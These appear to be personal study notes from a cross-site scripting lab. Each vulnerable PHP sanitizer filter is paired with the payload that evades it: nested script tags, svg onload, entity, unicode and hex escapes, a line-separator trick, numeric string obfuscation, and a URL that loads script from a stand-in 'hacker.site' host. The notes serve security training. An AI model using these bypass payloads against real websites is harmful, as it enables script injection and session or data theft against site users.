<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>XSS</title>
</head><body>Tools<br/>
<br/>
&nbsp;&lt;iframe src=”http://10.11.0.220:3000”&gt;&lt;/iframe&gt;<br/>
<br/>
<br/>
&lt;iframe width="700" scrolling="no" height="400" frameborder="0" src="http://10.11.0.220:3000" seamless="seamless"&gt; &nbsp; &nbsp;&lt;--invisible iframe<br/>
<br/>
<br/>
xsser --gtk &nbsp;***this will launch a ncie gui<br/>
<br/>
<br/>
<br/>
<br/>
****************Examples from the lab:<br/>
-----------------------<br/>
&lt;script&gt;alert('l33t')&lt;/script&gt;<br/>
<br/>
&lt;script &lt;script&gt;&gt;alert('l33t')&lt;/script&gt;<br/>
<br/>
&lt;svg/onload=alert('l33t')&gt;<br/>
<br/>
&lt;svg&gt;&lt;script&gt;alert('l33t')<br/>
<br/>
&lt;svg&gt;&lt;script&gt;alert&amp;lpar;'l33t'&amp;rpar;<br/>
<br/>
&lt;script&gt;\u0061lert('l33t')&lt;/script&gt;<br/>
<br/>
&lt;script&gt;eval('\x61lert(\'l33t\')')&lt;/script&gt;<br/>
<br/>
[NL]eval('\x61lert(\'l33t\')'<br/>
<br/>
[\u2028]eval('\x61lert(\'l33t\')'<br/>
<br/>
&lt;script&gt;eval(8680439..toString(30))(983801..toString(36))&lt;/script&gt;<br/>
<br/>
http://11.xss.labs%2f@hacker.site/x.js<br/>
<br/>
<br/>
<br/>
***********Examples from the lab, accompanied by the code/filter presented in lab<br/>
---------------------------------------------<br/>
function Sanitizer($search){<br/>
&nbsp; // Let's start...<br/>
&nbsp; return 'Your search "&lt;b&gt;' . $search . '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;script&gt;alert('l33t')&lt;/script&gt;<br/>
<br/>
------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; //To script, or not script.. <br/>
&nbsp; $search = preg_replace('#&lt;script([\s])*&gt;#is', NOSCRIPT, $search);<br/>
&nbsp; &nbsp;<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;script &lt;script&gt;&gt;alert('l33t')&lt;/script&gt;<br/>
<br/>
------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; //To script, or not script... this is no more the problem<br/>
&nbsp; $search = preg_replace('#&lt;script(.*?)&gt;#is', NOSCRIPT, $search);<br/>
&nbsp; &nbsp;<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;svg/onload=alert('l33t')&gt;<br/>
<br/>
-----------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; //Script must be closed, here's a stronger filter... isn't it? <br/>
&nbsp; $search = preg_replace('#&lt;script(.*?)&gt;(.*?)&lt;/script(.*)?&gt;#is', NOSCRIPT, $search);<br/>
&nbsp; //No ON no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search);<br/>
&nbsp; <br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;svg&gt;&lt;script&gt;alert('l33t')<br/>
<br/>
----------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; //No ON no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search);<br/>
&nbsp; //No Functions no party! <br/>
&nbsp; $search = preg_replace('#[()]#s', NOFUNCTIONS, $search);<br/>
&nbsp; &nbsp;<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;svg&gt;&lt;script&gt;alert&amp;lpar;'l33t'&amp;rpar;<br/>
<br/>
-----------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; //No alert no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#alert#is', NOALERT, $search);<br/>
<br/>
&nbsp; &nbsp;<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;script&gt;\u0061lert('l33t')&lt;/script&gt;<br/>
<br/>
-----------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; // No Unicode escaping.. there are a lot of smart guys out of there...<br/>
&nbsp; // Thanks to stackoverflow.com &gt; http://bit.ly/SO_decode_unicode<br/>
&nbsp; $search = preg_replace_callback('/\\\\u([0-9a-fA-F]{4})/', function ($m) {<br/>
&#09;return mb_convert_encoding(pack('H*', $m[1]), 'UTF-8', 'UCS-2BE');<br/>
&nbsp; }, $search);<br/>
&nbsp; &nbsp;<br/>
&nbsp; //No alert no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#alert#is', NOALERT, $search);<br/>
<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;script&gt;eval('\x61lert(\'l33t\')')&lt;/script&gt;<br/>
<br/>
------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; // Breaking bad... <br/>
&nbsp; &nbsp;<br/>
&nbsp; //No alert no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#alert#is', NOALERT, $search);<br/>
<br/>
&nbsp; return &lt;&lt;&lt;RESULT<br/>
&nbsp; &nbsp;No products here.. <br/>
&nbsp; &nbsp;&lt;!-- todo: debug this --&gt;<br/>
&nbsp; &nbsp;&lt;script&gt;<br/>
&nbsp; &nbsp; &nbsp; //console.debug( $search );<br/>
&nbsp; &nbsp;&lt;/script&gt;<br/>
RESULT;<br/>
}<br/>
<br/>
[NL]eval('\x61lert(\'l33t\')'<br/>
<br/>
-------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; // Breaking bad... more stronger<br/>
&nbsp; &nbsp;$search = preg_replace('#[\n\r]#', "", $search);<br/>
&nbsp; &nbsp;<br/>
&nbsp; //No alert no party! &nbsp;<br/>
&nbsp; $search = preg_replace('#alert#is', NOALERT, $search);<br/>
<br/>
&nbsp; return &lt;&lt;&lt;RESULT<br/>
&nbsp; &nbsp;No products here.. <br/>
&nbsp; &nbsp;&lt;!-- todo: debug this --&gt;<br/>
&nbsp; &nbsp;&lt;script&gt;<br/>
&nbsp; &nbsp; &nbsp; //console.debug( $search );<br/>
&nbsp; &nbsp;&lt;/script&gt;<br/>
RESULT;<br/>
}<br/>
<br/>
[\u2028]eval('\x61lert(\'l33t\')'<br/>
<br/>
--------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; // No more string ...<br/>
&nbsp; $search = preg_replace('#[\'"+]#', "", $search);<br/>
&nbsp; // ... no more alert ... &nbsp;<br/>
&nbsp; $search = preg_replace('#alert#is', NOALERT, $search);<br/>
&nbsp; // ... no no more alternative ways!<br/>
&nbsp; $search = preg_replace('#.source#is', "", $search);<br/>
&nbsp; $search = preg_replace('#.fromCharCode#is', "", $search);<br/>
<br/>
&nbsp; return 'Your search "&lt;b&gt;' + $search + '&lt;/b&gt;" did not match any products';<br/>
}<br/>
<br/>
&lt;script&gt;eval(8680439..toString(30))(983801..toString(36))&lt;/script&gt;<br/>
<br/>
----------------<br/>
<br/>
function Sanitizer($search){<br/>
&nbsp; &nbsp;// No scripts from untrusted origins or you'll see a nice gorilla<br/>
&nbsp; &nbsp;preg_match('#^(?:https?:)?\/\/11.xss.labs\/#is', urldecode($search), $matches); &nbsp; <br/>
&nbsp; &nbsp;if(empty($matches)) $search = "...untrusted..."; &nbsp; <br/>
<br/>
&nbsp; &nbsp;// don't break the src tag &nbsp; <br/>
&nbsp; &nbsp;$search = preg_replace('#"#', "", $search);<br/>
&nbsp; &nbsp;// ehehe and now? Are you still a ninja?<br/>
&nbsp; &nbsp;$search = strtoupper($search);<br/>
}<br/>
<br/>
http://11.xss.labs%2f@hacker.site/x.js</body></html>